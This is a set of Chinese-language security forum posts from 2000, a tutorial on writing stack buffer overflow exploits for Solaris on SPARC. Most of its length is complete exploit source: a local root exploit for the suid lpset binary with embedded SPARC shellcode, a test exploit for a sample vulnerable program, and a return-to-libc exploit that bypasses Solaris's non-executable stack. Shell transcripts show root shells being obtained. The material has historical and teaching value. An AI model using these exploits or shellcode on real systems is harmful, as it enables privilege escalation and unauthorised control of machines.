   节数是和打印机名称长度有关的。实际填充长度= 944 + 4("blah"长度为4个字节) - 
   strlen(printer).

   有了上面的分析，我们就可以来写测试程序了：

-----------------------------------------------------------------------------------------
/*                ---> lpset_sparc.c <---
* lpset exploit for Solaris 2.6/7 Sparc .
*
* It is one test for writing exploits in Sparc ,just for EDUCATIONAL purpose.:)
* tested in Solaris 2.6/7 /sparc.
* Usages: 
*         ./lpset_sparc <align> <offset> <bufsize>  
* in most cases, bufsize is fixed, offset=1500 is OK .
* If it don't work, you just need adjust align value from 0 to 3.
*                                                by warning3@hotmail.com
*                                                          y2k/5/5
*/
#include <stdio.h>

#define BUFSIZE 944         /* the size of overflowed buffer*/
#define EGGSIZE 1024        /* the egg buffer size */
#define NOP     0xaa1d4015  /* "xor %l5, %l5, %l5" */ 
#define ALIGN   1           /* If don't work ,try adjust align to 0,1,2,3 */
#define OFFSET  1500 
#define PRINTER "blah"

char shellcode[] = /* from scz's funny shellcode for SPARC */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"   /* setuid(0)  */
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29" 
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";

/* get current stack point address to guess Return address */
long get_esp(void)   

{
        __asm__("mov %sp,%i0");
} 


main( int argc, char **argv )

{

        char *pattern,eggbuf[EGGSIZE],*env[2];

        long retaddr, i; 
        long bufsize=BUFSIZE, offset=OFFSET, align=ALIGN, patternsize ;
        long  *addrptr;
        
        if( argc > 1 ) align = atoi(argv[1]);
        if( argc > 2 ) offset = atoi(argv[2]);
        if( argc > 3 ) bufsize =  atoi(argv[3]);
        
        
        retaddr = get_esp() + offset; /* Guess return address */
        printf("Usages: %s <align> <offset> <bufsize> \n\n", argv[0] );
        printf("Using RET address = 0x%x  ,Bufsize = %d, Offset = %d, Align= %d\n"
                    , retaddr, bufsize, offset, align );

        /* bufsize + reserved area + saved in/local + NULL */ 
        patternsize = bufsize + 4*4 + 16*4 + 1;

        if((pattern = (char *)malloc(patternsize)) == NULL) {
           printf("Can't get enough memory!\n");
           exit(-1);
        }

        memset(pattern, 'C', patternsize  );/* fill pattern buffer with garbage */
        memset(pattern+20, 0x3d, 1);  /* put '=' into buf */
        addrptr = (long *) (pattern + bufsize + 4*4 ); /* move to saved %l0 */
        
        /* Let's overwrite caller function's saved stack frame 
         */

        for( i = 0 ; i < 16 ; i ++ )
            *addrptr++ = retaddr;       /* saved (%l0-%l7),(%i0-%i7) */

        /* construct shellcode buffer */

        memset(eggbuf,'A',EGGSIZE);   /* fill the eggbuf with garbage */
        for (i = align; i < EGGSIZE; i+=4) /* fill with NOP */ 
        {
           eggbuf[i+3]=NOP & 0xff;
           eggbuf[i+2]=(NOP >> 8 ) &0xff;
           eggbuf[i+1]=(NOP >> 16 ) &0xff;
           eggbuf[i+0]=(NOP >> 24 ) &0xff;  /* Big endian */ 
         }
         /* Notice : we assume the length of shellcode can be divided exatcly by 4 .
            If not, exploit will fail. Anyway, our shellcode is. ;-)
          */     
         memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4  + align, shellcode, strlen(shellcode));
         memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */
         env[0] = eggbuf;    /* put eggbuf in env */
         env[1] = NULL;      /* end of env */
         
         /* adjust pattern size by printer length */
         execle("/usr/bin/lpset", "lpset","-n","fns"
                     ,"-a",(pattern + strlen(PRINTER) - 4 ),PRINTER,NULL,env);
}  /* end of main */
------------------------------------------------------------------------------------------------    

[warning3@sun1 test]$ gcc -o lp_ex lpset_sparc.c
[warning3@sun1 test]$ ./lp_ex
Usages: ./lp_ex <align> <offset> <bufsize> 

Using RET address = 0xffbefcb4  ,Bufsize = 944, Offset = 1500, Align= 1
# id
uid=0(root) gid=1(other)        <--- 成功了!
#

   通过上面的例子，我想读者已经发现，在Solaris下写溢出程序其实也没有什么特别的
   难点。只要理解了函数调用的机理，再注意一下SPARC架构的特殊性(比如，边界对齐),
   应该很容易就可以自己动手写了。

 
发信人: scz (小四), 信区: Security
标  题: Solaris for SPARC 堆栈溢出程序编写(2)
发信站: 武汉白云黄鹤站 (Mon May 15 00:10:23 2000), 站内信件

2.  普通溢出程序编写

   2.1  基本思路    

    从前面所讲的函数调用的过程可以知道，我们是不可能覆盖当前函数的返回地址的，因
    为当前函数的返回地址是保存在寄存器%i7中的，然而，我们可以覆盖当前函数的主调
    函数的栈帧，即%fp往后的区域，这里保存有主调函数的%l0-%l7和%i0-%i7.
    以上面的程序为例，只要输入(n*8 + 4*4 + 8*4 + 8*4)个字节长的数据，就可以完全
    覆盖main()函数保存的%l0-%l7和%i0-%i7,这样，当func()执行完restore指令后，就会
    将我们修改过的堆栈内容恢复到in和local寄存器中。而当main()函数执行ret指令返回
    时，就跳到(%i7+8)的地址去运行了，只要在这个地址事先放入我们的shellcode就行了。

    因此，在SPARC平台下面，我们至少需要两次返回才能完成攻击。这和i386下是不一样
    的。这也意味着，如果在main()函数中存在溢出漏洞，你是不可能攻击成功的。因为在
    从main()返回后，通常<_start>会调用或者<_exit>退出，因此你不可能再修改
    寄存器%i7的值并跳到那里执行。例如，象这样的程序是不可能进行溢出攻击的，有兴
    趣的人可以试一试。

    /*   vul1.c   */               
    int main(int argc, char **argv)
    {                              
       char buf[8];                
                                   
       strcpy(buf,argv[1]);        
    }                              
    /*  end of vul1.c */           

   2.2  实现方法
   
   理解了上面的函数调用的过程之后，那么写攻击程序其实就和Linux很相似了。只要用返
   回地址覆盖保存的%i7就可以了，示意图如下：

   地址   -----------------------------> 高址      
                       %fp       %fp+32            
   -------------------------------------------     
   | buffer | 保留区域 | %l0-%l7 | %i0 - %i7 |          
   --------------------------------------------    
   | NOPNOP...SHELLCODE|     RET ... RET     |     
   -------------------------------------------- 
      ^                                            
      |                        |                   
      \------------------------/                   
                                                                                            
   关于SPARC平台下shellcode的编写，可以参看scz的<   编写>>，这里不再赘述。                                                                           
                                                                                            
   如果buffer比较小，放不下我们的shellcode，有两种方法可以解决:                             
   一是将"NOP...NOP..SHELLCODE"部分移到"RET..."后面，                                       
                                                                                         
   地址   -----------------------------> 高址                                               
                       %fp       %fp+32                                                     
   ----------------------------------------------------------------                         
   | buffer | 保留区域 | %l0-%l7 | %i0 - %i7 | .....              |                         
   ----------------------------------------------------------------                         
   | RET    ...       RET        ... RET     | NOPNOP...SHELLCODE |                         
   ----------------------------------------------------------------                      
                      |                          ^                                          
                      |                          |                                          
                      \--------------------------/                                          
                                                                                            
   二是将shellcode放到环境变量中去，将RET指向环境变量，                                     
                                                                                            
   地址   -----------------------------> 高址                                               
                       %fp       %fp+32            environ                                  
   -------------------------------------------    ---------------------                     
   | buffer | 保留区域 | %l0-%l7 | %i0 - %i7 |    | .....              |                    
   -------------------------------------------    ---------------------                     
   | RET    ...       RET        ... RET     |    | NOPNOP...SHELLCODE |                    
   --------------------------------------------   -------------------                    
                      |                             ^                                       
                      |                             |                                       
                      \-----------------------------/                                       
                                                                                            
   采用哪种方法理论上都是可以的。在这里我只举一个例子，使用环境变量来存放我们的             
   shellcode.需要注意的问题是，                                                             
                                                                                            
   (1) 这里的NOP指令是4个字节的指令，这要求我们的返回地址必须指向NOP指令的第一个
       字节在i386中,NOP指令是一个字节，因此，要求并不这么严格)                                 
   (2) NOP指令的起始地址必须在4字节边界上（能被四整除)，否则将导致总线错误。                 
   (3) 在SPARC平台下,堆栈中buffer的大小是按8的倍数分配的,这是在确定buffer大小的
       时候要注意的。                                                                            
   
   2.3  一个针对vul.c的测试程序exp.c
                                                                                            
   下面是一个测试程序，用来攻击我们前面的vul.c。我们采用execle()执行./vul,使我们
   的环境变量尽可能的少，我们的shellcode将放在堆栈的高端,这个地址是相对固定的，
   比较容易猜测。调整offset(必须是4的倍数)使返回地址落在NOP指令当中，如果该地址不
   与NOP指令的第一个字节对齐，再调整align的值(从0-3即可),使之对齐。    

--


            也许有一天，他再从海上蓬蓬的雨点中升起，
            飞向西来，再形成一道江流，再冲倒两旁的石壁，
            再来寻夹岸的桃花。然而，我不敢说来生，也不敢信来生......

※ 来源:．武汉白云黄鹤站 bbs.whnet.edu.cn．[FROM: 203.207.226.124]


--------------------------------------------------------------------------------

分类讨论区  全部讨论区  上一篇  本讨论区  回文章  下一篇 
发信人: scz (小四), 信区: Security
标  题: Solaris for SPARC 堆栈溢出程序编写(3)
发信站: 武汉白云黄鹤站 (Mon May 15 00:12:12 2000), 站内信件

--------------------------------------------------------------------------
/*
 * exp.c  -- test exploit for vul.c in Solaris for SPARC .
 * gcc -o exp exp.c
 *                 by warning3 
 *                                            y2k/5/5   
 */
 
#include 

#define BUFSIZE 8         /* the size of overflowed buffer*/
#define EGGSIZE 1024        /* the egg buffer size */
#define NOP     0xaa1d4015  /* "xor %l5, %l5, %l5" */ 
#define ALIGN   0           /* If don't work ,try adjust align to 0,1,2,3 */       
#define OFFSET  1500 


char shellcode[] = /* from scz's funny shellcode for SPARC */ 
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"   /* setuid(0)  */          
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29" 
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";

/* get current stack point address to guess Return address */
long get_esp(void)   

 {
        __asm__("mov %sp,%i0");
 } 


main( int argc, char **argv )

 {
 
        char *pattern,eggbuf[EGGSIZE],*env[2];

        long retaddr, i; 
        long bufsize=BUFSIZE, offset=OFFSET, align=ALIGN, patternsize ;
        long  *addrptr;
        
        if( argc > 1 ) align = atoi(argv[1]);
        if( argc > 2 ) offset = atoi(argv[2]);
        if( argc > 3 ) bufsize =  atoi(argv[3]);
        
        
        retaddr = get_esp() + offset; /* Guess return address */
        printf("Usages: %s    \n\n", argv[0] );
        printf("Using RET address = 0x%x  ,Bufsize = %d, Offset = %d, Align= %d\n", retaddr, bufsize, offset, align );
 
        /* bufsize + reserved area + saved in/local + NULL */ 
        patternsize = bufsize + 4*4 + 16*4 + 1;

        if((pattern = (char *)malloc(patternsize)) == NULL) {
           printf("Can't get enough memory!\n");
           exit(-1);
        }

        memset(pattern, 'C', patternsize );/* fill pattern buffer with garbage */
        addrptr = (long *) (pattern + bufsize + 4*4 ); /* move to saved %l0 */
        
        /* Let's overwrite caller function's saved stack frame  */

        for( i = 0 ; i < 16 ; i ++ )
            *addrptr++ = retaddr;       /* saved (%l0-%l7),(%i0-%i7) */

        /* construct shellcode buffer */

        memset(eggbuf,'A',EGGSIZE);   /* fill the eggbuf with garbage */
        for (i = align; i < EGGSIZE; i+=4) { /* fill with NOP */ 
           eggbuf[i+3]=NOP & 0xff;
           eggbuf[i+2]=(NOP >> 8 ) &0xff;
           eggbuf[i+1]=(NOP >> 16 ) &0xff;
           eggbuf[i+0]=(NOP >> 24 ) &0xff;  /* Big endian */ 
        } 
             

         /* Notice : we assume the length of shellcode can be divided exatcly by 4 .
            If not, exploit will fail. Anyway, our shellcode is. ;-)
          */     
         memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4  + align, shellcode, strlen(shellcode));
         memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */
         env[0] = eggbuf;    /* put eggbuf in env */
         env[1] = NULL;      /* end of env */
         
         execle("./vul", "./vul",pattern,NULL,env);
}  /* end of main */
--------------------------------------------------------------------------

测试一下：
[warning3@sun1 test]$ ls -l vul exp
-rwxr-xr-x   1 root     other      25664 May  5 10:17 exp
-rwsr-xr-x   1 root     other      24576 May  4 23:25 vul
[warning3@sun1 test]$ id
uid=100(warning3) gid=1(other)
[warning3@sun1 test]$ ./exp
Usages: ./exp    

Using RET address = 0xffbefe0c  ,Bufsize = 8, Offset = 1500, Align= 

# id
uid=0(root) gid=1(other)       <----  成功了!
# 
 
 
   2.4  一个实际测试程序的编写过程(lpset_sparc.c)
 
   下面我们以一个实际的例子来详细的讲述怎样写一个攻击程序。在Solaris下lpset被设
   置了suid位，当给它的"-a"开关提供一个很长的参数时，将导致它发生溢出。(这个漏洞
   是日本安全小组The Shadow Penguin Security发现的)
   
   先来看看man lpset:

   NAME
         lpset - set printing configuration in /etc/printers.conf  or
         FNS

   SYNOPSIS
         lpset  [-n system  | fns ]  [ -x  ]   [  -a key=value  ]   [
         -d key ] destination
   ...     
   
   我们看到，"-a"的参数中必须包含一个"="号，否则不能正常工作。

   测试一下：
[root@ /test]> /usr/bin/lpset -n fns -a A=`perl -e 'print "A"x800'` blah
write operation failed        <----- 没有溢出
[root@ /test]> /usr/bin/lpset -n fns -a A=`perl -e 'print "A"x1024'` blah
总线错误 (core dumped)        <----- OK,溢出发生了

[root@ /test]> gdb /usr/bin/lpset core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
<...省略显示内容...>
(no debugging symbols found)...done.
#0  0xff3770cc in ns_printer_put () from /usr/lib/libprint.so.2
(gdb) bt
#0  0xff3770cc in ns_printer_put () from /usr/lib/libprint.so.2
Cannot access memory at address 0x41414179.
(gdb) i r
<.....>
o0             0x100    256
o1             0xff38a698       -13064552
o2             0x27fa8  163752
o3             0xff3784d0       -13138736
o4             0x100    256
o5             0xff3770c4       -13143868
sp             0xffbef6d0       -4262192   <--- 当前堆栈指针
o7             0xff3770c4       -13143868
l0             0x41414141       1094795585 <--- local和in都已经被恢复成我们填充
l1             0x41414141       1094795585      的数据0x41414141
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0x41414141       1094795585
i7             0x41414141       1094795585
<.....>
pc             0xff3770cc       -13143860 <--- 我们看看程序下一步该干什么了
npc            0xff3770d0       -13143856
<.....>
(gdb) disass 0xff3770cc
<.....>
0xff3770c4 : call  %o1
0xff3770c8 : mov  %i0, %o0
0xff3770cc : ret       <--- 下一步要返回了
0xff3770d0 : restore  %g0, %o0, %o0
0xff3770d4 : mov  -1, %i0
0xff3770d8 : ret 
0xff3770dc :        restore 
End of assembler dump.
(gdb) x/32x $sp
0xffbef6d0: 0x41414141      0x41414141      0x41414141      0x41414141
0xffbef6e0: 0x41414141      0x41414141      0x41414141      0x41414141<--%l0-%l7
0xffbef6f0: 0x41414141      0x41414141      0x41414141      0x41414141
0xffbef700: 0x41414141      0x41414141      0x41414141      0x41414141<--%i0-%i7
0xffbef710: 0x41412220      0x3e2f6465      0x762f6e75      0x6c6c2032
                ------
                      \--- 多了两个字节 
0xffbef720: 0x3e263100      0x00000001      0x00ff0000      0x00011100
0xffbef730: 0x78666e5f      0x7075745f      0x7072696e      0x74657200
0xffbef740: 0x00000000      0xff31e128      0xffbef750      0x00000000

   很明显，程序是在执行完call %o1以后，再执行ret/restore时出错的。我们看到这时候，
   %i0-%i7和%l0-%l7已经被恢复成我们输入的数据。从这里我们其实已经可以测算出我们
   需要的bufsize了，bufsize= (1024 + 2) - 2 - 8*8 - 4*4 = 944字节。
   不过我们还是来确认一下比较好，我们在堆栈中找一找"call %o1"的栈帧，即然我们输
   入的参数长度已经有1026长了，那么我们检查一下当前%sp-1200前都有些什么内容：

(gdb) x/1000x $sp-1200
0xffbef240: 0x41414141      0x41414141      0x41414141      0x41414141
0xffbef250: 0x41414141      0x41414141      0x41414141      0x41414141
0xffbef260: 0x7ffffbac      0xffbef723      0xff3375e0      0xff3375d8

0xffbef270: 0x41414141      0x2200cd08      0xff000000      0x00ff0000
 \--------- 上一个被调函数的栈帧起始地址
0xffbef280: 0x0000ff00      0x01010100      0x00000000      0x00000000<--%l0-%l7
0xffbef290: 0x000252c0      0xff38a698      0x00027fa8      0xff3784d0
0xffbef2a0: 0x00000100      0xff3770c4      0xffbef6d0      0xff3770c4<--%i0-%i7
                                                \---------- 我们的当前堆栈指针
0xffbef2b0: 0x000229d0      0xffbef2d0      0x00000000      0xff38b630
0xffbef2c0: 0xff38b64c      0x00026220      0x00027fa8      0x00000002<--参数域
0xffbef2d0: 0x2f757372      0x2f62696e      0x2f666e63      0x72656174
 \---------- 局部变量起始地址    
0xffbef2e0: 0x655f7072      0x696e7465      0x72202d73      0x20746869
0xffbef2f0: 0x736f7267      0x756e6974      0x2f736572      0x76696365
0xffbef300: 0x2f707269      0x6e746572      0x20626c61      0x68202022
0xffbef310: 0x413d4141      0x41414141      0x41414141      0x41414141
 \---------- 我们输入的参数的起始地址          
<......>

   我们很容易就找到了上一个被调函数的栈帧位置(0xffbef270),局部变量的起始地址
   是0xffbef2d0,而我们输入的参数被放到了0xffbef310处，让我们看得更清楚一点:

(gdb) x/10s 0xffbef2d0
0xffbef2d0:      "/usr/bin/fncreate_printer -s thisorgunit/service/printer blah  \"A=", 'A' ...
0xffbef398:      'A' ...
0xffbef460:      'A' ...
0xffbef528:      'A' ...
0xffbef5f0:      'A' ...
0xffbef6b8:      'A' , "\" >/dev/null 2>&1"
0xffbef724:      ""
0xffbef725:      ""
0xffbef726:      ""
0xffbef727:      "\001"

   这样我们就可以得到准确的bufsize了,bufsize=(0xffbef6d0-0xffbef310) - 4*4 = 944
   ,和前面推算的吻合。另外需要注意的是：
   我们看到"blah"是我们输入的打印机名称，它被放到了"\"A=AA...A\"前面，因此，如果
   打印机名称长度有变化,将导致整个"\"A=AA...A\"往高址方向移动，因此实际填充的字
   节数是和打印机名称长度有关的。实际填充长度= 944 + 4("blah"长度为4个字节) - 
   strlen(printer).

   有了上面的分析，我们就可以来写测试程序了：
--


            也许有一天，他再从海上蓬蓬的雨点中升起，
            飞向西来，再形成一道江流，再冲倒两旁的石壁，
            再来寻夹岸的桃花。然而，我不敢说来生，也不敢信来生......

※ 来源:．武汉白云黄鹤站 bbs.whnet.edu.cn．[FROM: 203.207.226.124]


--------------------------------------------------------------------------------

分类讨论区  全部讨论区  上一篇  本讨论区  回文章  下一篇 
发信人: scz (小四), 信区: Security
标  题: Solaris for SPARC 堆栈溢出程序编写(4)
发信站: 武汉白云黄鹤站 (Mon May 15 00:15:31 2000), 站内信件

3. 绕过不可执行堆栈保护的溢出程序编写         

   关于堆栈保护以及绕过堆栈保护的讨论已经持续了很长一段时间了，Solar Designer提
   出了返回libc的方法，Nergal又提出了一种伪造堆栈帧利用strcpy来绕过不可执行堆栈
   保护的方法，不过这些方法都是针对Linux系统的(我已经在另外的文章里专门介绍如何
   绕过Solar Designer的Linux不可执行堆栈补丁的方法)。而在Solaris 2.6/7(SPARC平
   台)中也提供了一种方法来禁止堆栈可执行，从而提高了系统的安全性,
   即在/etc/system中加入两条语句:

   set noexec_user_stack = 1
   set noexec_user_stack_log = 1
   
   第一条用来使用户的堆栈不可执行，第二条用来记录任何试图在堆栈中执行代码的尝试。
   (注意：需要重新启动系统来使之生效 )
 
   然而，这种保护机制仍然是可以绕过的，Horizon首先分析了利用返
   回libc的方法击败Solaris不可执行堆栈的保护。下面我们就来介绍一下这种方法。
   
   3.1 基本思路
      
   Solaris的不可执行堆栈保护好像只是检查返回地址是不是在堆栈中，如果是，就报段错
   误，并记录，并没有做什么其他的措施。我们只要不返回堆栈就可以了，那我们去哪里
   呢？可以代码段，也可以是可执行的数据段。我们通常要做的是得到一个shell。如果能
   执行system("/bin/sh")就可以了，我们可以在共享库中找到system()的地址,用它来做
   返回地址，参数"/bin/sh"可以从共享库中找(通常都会包含)，也可以通过环境变量传递。
   
   仍然以前面的vul.c为例，如果我们要写一个测试程序，执行流程通常是这样的：
   
   <1> 首先给strcpy提供长参数
   <2> strcpy()将覆盖main()函数栈帧中保存的%i和%l寄存器内容
   <3> func()函数执行resotre指令，CWP(寄存器窗）加一，然后我们覆盖的%i和%l值被从
       堆栈中取出，放入寄存器%i和%l中,%i变成%o 。程序返回到main()中执行。
   <4> main()函数又会执行ret/restore指令，ret指令会跳到(%i7+8)处执行，restore指
       令将使CWP再增加一，并将%i变成%o（%i0变成了%o0)。
      
   如果我们覆盖时将保存的%i0用"/bin/sh"的地址代替，保存的%i7用(system()的地址- 8)
   代替，那么这时候程序就会执行system("/bin/sh")了。当调用system()函数的时候，会
   先执行一条'save'指令，将%o0变成%i0.由于system()的地址不在堆栈段内，因此并不会
   违反保护规则。   

   3.2 一个针对vul.c的测试程序ex_noexec.c
   
   明白了上述过程，我们可以写测试程序了：      
--------------------------------------------------------------------------------
/*                       ex_noexec.c
 * simple test exploit for  Solaris with noexec_stack feature.
 *                         by warning3 
 *                                                   y2k/5/5
 */
 
#include 
#include 
#include 
#include 

#define VULPROG "./vul"

#define BUFSIZE 8    /* the size of overflowed buffer*/


int step;            /* 搜索"/bin/sh"时的步长和方向   */
jmp_buf jmpenv;      /* 定义一个jmp_buf来储存当前栈帧 */

void fault()                  
{
   if (step<0)   /* 如果步长小于0,恢复保存的栈帧，setjmp()返回1值,反方向搜索 */
      longjmp(jmpenv,1);
   else          /* 如果步长大于0,说明已经两个方向都搜索完毕，报错 */
   {
      printf("Couldn't find /bin/sh at a good place in libc.\n");
      exit(1);
   }
}

long get_sp(void)         /* 得到当前堆栈指针地址 */

 {
        __asm__("mov %sp,%i0");
 } 


main( int argc, char **argv )

 {
 
         char *env[1]; /* 环境变量指针数组 */

         void *handle; /* 动态联接库句柄 */           
         long system_addr; /* system()的地址 */


        char *pattern;  /* 构造覆盖数据的buffer */

        long sh_addr, i, fp_addr; 
        long bufsize=BUFSIZE, patternsize ;
        long  *addrptr;

        if( argc > 1 ) bufsize = atoi(argv[1]);
        
        /* 设置一个可用(写)的fp地址，运行system()时会用到 */
        fp_addr = (get_sp() | 0xffff) & 0xfffffac0; 
        
        printf("Usages: %s   \n", argv[0] );
        printf("Using FP address = 0x%x,  Bufsize = %d\n", fp_addr, bufsize );
 
        if (!(handle=dlopen(NULL,RTLD_LAZY)))   /* 打开当前使用的动态连结库 */                                                                  
        {                                                                                                         
           fprintf(stderr,"Can't dlopen myself.\n");                                                              
           exit(1);                                                                                               
        }                                                                                                         
                                                                                                                  
        /* 找到system()的地址 */ 
        if ((system_addr=(long)dlsym(handle,"system"))==NULL)                                                    
        {                                                                                                         
           fprintf(stderr,"Can't find system().\n");                                                               
           exit(1);                                                                                               
        }                                                                                                         
                                                                                                                  
        system_addr -= 8; /* 因为ret时,会跳到(%i7+8)处去执行，所以这里要减8 */                                                                    
                             
        /* 检查是不是包含零字节 */                                                                                                           
        if (!(system_addr & 0xff) || !(system_addr * 0xff00) ||                                                   
           !(system_addr & 0xff0000) || !(system_addr & 0xff000000))                                              
        {                                                                                                         
           fprintf(stderr,"the address of execl() contains a '0'. sorry.\n");                                     
           exit(1);                                                                                               
        }                                                                                                         
                                                                                                                  
        
        printf("found system() at 0x%lx\n",system_addr);                                                          
                                                                                                                  
        /* 在libc库中搜索"/bin/sh"地址，这是Solar Designer提供的方法 */                                 
                                                                                                                  
        if (setjmp(jmpenv))  /* 如果setjmp返回1,设置搜索步长为1 */                                                                                     
           step=1;                                                                                                
        else                 /* 如果setjmp返回0(缺省返回0),设置搜索步长为-1 */                                                                                      
           step=-1;                                                                                               
                                                                                                                  
        sh_addr=system_addr; /* 设置起始搜索地址为system()地址 */                                                                                     
                                                                                                                  
        signal(SIGSEGV,fault);  /* 设置信号捕捉，当搜索导致段错误时，执行fault() */                                                                                  
        
        /* 在system()地址的两侧搜索"/bin/sh"地址 */                                                                                                          
        
        while (memcmp((void *)sh_addr, "/bin/sh", 8)) sh_addr+=step;                                           
        
        /* 检查得到的地址是否包含零字节 */   
        if (!(sh_addr & 0xff) || !(sh_addr & 0xff00) || !(sh_addr & 0xff0000)                                  
              || !(sh_addr & 0xff000000))                                                                        
        {                                                                                                         
             fprintf(stderr,"the address of \"/bin/sh\" contains a '0'. sorry.\n");                                     
             exit(1);                                                                                               
        }                                                                                                         
               
        printf("found \"/bin/sh\" at 0x%lx\n",sh_addr);                                                               
        
        /* 为覆盖数据分配空间 */
        patternsize = bufsize + 4*4 + 16*4 + 1;

        if((pattern = (char *)malloc(patternsize)) == NULL) {
           printf("Can't get enough memory!\n");
           exit(-1);
        }

        memset(pattern, 'C', patternsize );/* fill pattern buffer with garbage */
        /* 指针移动到保存的%l0处 */
        addrptr = (long *) (pattern + bufsize + 4*4 ); 
        
        /* Let's overwrite caller function's saved stack frame 
           I know it's ugly,but just make it more clearly .:)
         */

        /* saved %l0-%l7，这些内容可以填充任意数据 */

        *addrptr++ = fp_addr;       /* %l0 */ 
        *addrptr++ = fp_addr;       /* %l1 */ 
        *addrptr++ = fp_addr;       /* %l2 */ 
        *addrptr++ = fp_addr;       /* %l3 */ 
        *addrptr++ = fp_addr;       /* %l4 */ 
        *addrptr++ = fp_addr;       /* %l5 */ 
        *addrptr++ = fp_addr;       /* %l6 */ 
        *addrptr++ = fp_addr;       /* %l7 */ 

        /* saved %i0-%i7 */
        *addrptr++ = sh_addr;       /* %i0 ，用"/bin/sh"地址填充 */ 
        *addrptr++ = fp_addr;       /* %i1 */ 
        *addrptr++ = fp_addr;       /* %i2 */ 
        *addrptr++ = fp_addr;       /* %i3 */ 
        *addrptr++ = fp_addr;       /* %i4 */ 
        *addrptr++ = fp_addr;       /* %i5 */ 
        *addrptr++ = fp_addr;       /* saved %fp(%i6), 这个%fp必须是可用的地址 */       
        *addrptr++ = system_addr;   /* saved ret addr (%i7), (system() - 8 ) */


        env[0]=NULL;

        execle(VULPROG, VULPROG, pattern,NULL,env);
 
} /* end of main */

------------------------------------------------------------------------------
--


            也许有一天，他再从海上蓬蓬的雨点中升起，
            飞向西来，再形成一道江流，再冲倒两旁的石壁，
            再来寻夹岸的桃花。然而，我不敢说来生，也不敢信来生......

※ 来源:．武汉白云黄鹤站 bbs.whnet.edu.cn．[FROM: 203.207.226.124]


--------------------------------------------------------------------------------

分类讨论区  全部讨论区  上一篇  本讨论区  回文章  下一篇 
发信人: scz (小四), 信区: Security
标  题: Solaris for SPARC 堆栈溢出程序编写(5)
发信站: 武汉白云黄鹤站 (Mon May 15 00:16:46 2000), 站内信件

   3.3  不能得到root shell的分析以及解决方法

   我们看到，我们成功得到了一个shell,但是却没有得到root shell.这是因为system
   (cmsd)实际上是执行了"/bin/sh -c cmd",而Solaris 下的/bin/sh如果检查到进程的
   euid=0但用户真实uid不为0,就会将进程euid设置成用户真实uid,因此，在这种情况下
   ，我们是无法通过system()来获得root shell的。
   
  （另外我们注意到在"exit"的时候，进程死掉了，必须按Ctrl_C终止，这是因为当
   system()执行save后，%o7会变成%i7,当system()重新ret/restore时,程序又会跳到
   (%i7+8),这样程序就陷入死循环了。有另外的办法来解决这个问题，后面我们会提到）

   那么我们可不可以先执行一个setuid(0),然后再执行system()来获得root shell呢？
   理论上似乎是可行的。只要再构造一个setuid()的假栈帧就可以了。但是实际上是行不
   通的，因为SPARC平台下的函数有两种，一种是leaf(叶函数），一种是非leaf（页)函数
   .leaf函数通常比较简单，为了提高效率，它们不是利用堆栈传递参数，而只是利用out
   寄存器，因此，在leaf函数的过程调用中是没有save和restore指令的，它们返回时使用
   retl而不是ret指令。retl等价于：
   jmpl %o7,  8, %g0 （注意不是 %i7 + 8 )
   
   而非leaf函数则使用save/restore指令保存/恢复栈帧，并使用ret返回.

   在跳到leaf函数执行的时候，retl时又会跳到(%o7+8)去执行，这就陷入了死循环(因为
   %o7就是setuid()的地址-8)，而且没有办法解决。因此我们的system()也就永远不会被
   继续执行了。

   我们看个简单的leaf函数的例子来加深一下理解：
 
bash-2.03$ cat > set.c
main()
{
setuid(0);

}
^D
bash-2.03$ gcc -o set set.c -static
bash-2.03$ gdb ./set
GNU gdb 4.18
<....>
No symbol "set" in current context.
(gdb) disass main
Dump of assembler code for function main:
0x101b8 : save  %sp, -112, %sp
0x101bc :       clr  %o0
0x101c0 :       call  0x10d74 
0x101c4 :      nop 
0x101c8 :      ret 
0x101cc :      restore 
End of assembler dump.
(gdb) disass setuid
Dump of assembler code for function setuid:
0x10d74 :       mov  0x17, %g1    <--- 没有save指令
0x10d78 :     ta  8
0x10d7c :     bcc  0x10d90 
0x10d80 :    sethi  %hi(0x16400), %o5
0x10d84 :    or  %o5, 0x328, %o5     ! 0x16728 <_cerror>
0x10d88 :    jmp  %o5
0x10d8c :    nop 
0x10d90 :    retl          <--- 不是ret指令
0x10d94 :    mov  %g0, %o0 <--- 没有restore指令
End of assembler dump.
(gdb) 

   那么我们用什么办法来解决问题呢？考虑一下我们的shellcode,通常都是执行的
   execl("/bin/sh","/bin/sh",NULL).  那么我们也可以通过直接使用execl()来执行任意
   命令。既然我们不能利用/bin/sh,可以考虑执行/bin/ksh(它没有这个限制),或者/tmp/
   blah,一样可以达到我们的目的。
   --------------------------------------------------
   /* gcc -o /tmp/blah /tmp/blah.c */

   main()
   {
     setuid(0);
     execl("/bin/sh","/bin/sh",0);      
        
   }    
   ---------------------------------------------------

